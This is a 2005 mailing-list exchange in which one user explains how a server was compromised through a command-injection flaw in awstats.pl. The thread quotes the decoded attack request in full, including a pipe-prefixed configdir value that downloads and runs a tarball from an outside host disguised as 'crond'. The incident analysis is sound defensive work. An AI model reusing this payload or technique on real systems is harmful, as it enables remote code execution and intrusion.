Security Breach

[Paul Howarth]

David Cary Hart wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> 
>>David Cary Hart wrote:
>>>Could you explain the series of events? It's not clear - to me - how
>>>this resulted in a compromised machine.
>>
>>Replace the url-encoded characters and you get:
>>
>>/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget 
>>zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv 
>>mech crond;export PATH=;crond;echo e_exp;%00
>>
>>So the attacker has tricked the script into executing a set of shell 
>>commands, which include changing directory to /tmp, downloading a 
>>tarball from a Romanian site, extracting that tarball and then executing 
>>a program from the downloaded and extracted tarball, after renaming it 
>>to "crond" in an effort to disguise it.
> 
> 
> I got that part. What I am trying to understand (please bear with me) is
> how the attacker might have modified the script command line.

I'm not all that familiar with perl, so the following may be completely 
wrong, but here goes.

awstats.pl contains code to search for its configuration file. A 
directory name may be specified as a parameter to the script. For each 
directory that the script searches, it tries the following:

if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf")) ...

Normally, this would cause the file pointed to by the expansion of 
"$searchdir$PROG.$SiteConfig.conf" to be opened. Now, if $searchdir 
starts with "|", instead of opening a file and then reading it, this 
runs the text following the "|" as a command and then reads back the 
output of the command from a pipe. So by using the "|", the attacker has 
tricked the script into running his command.

Paul.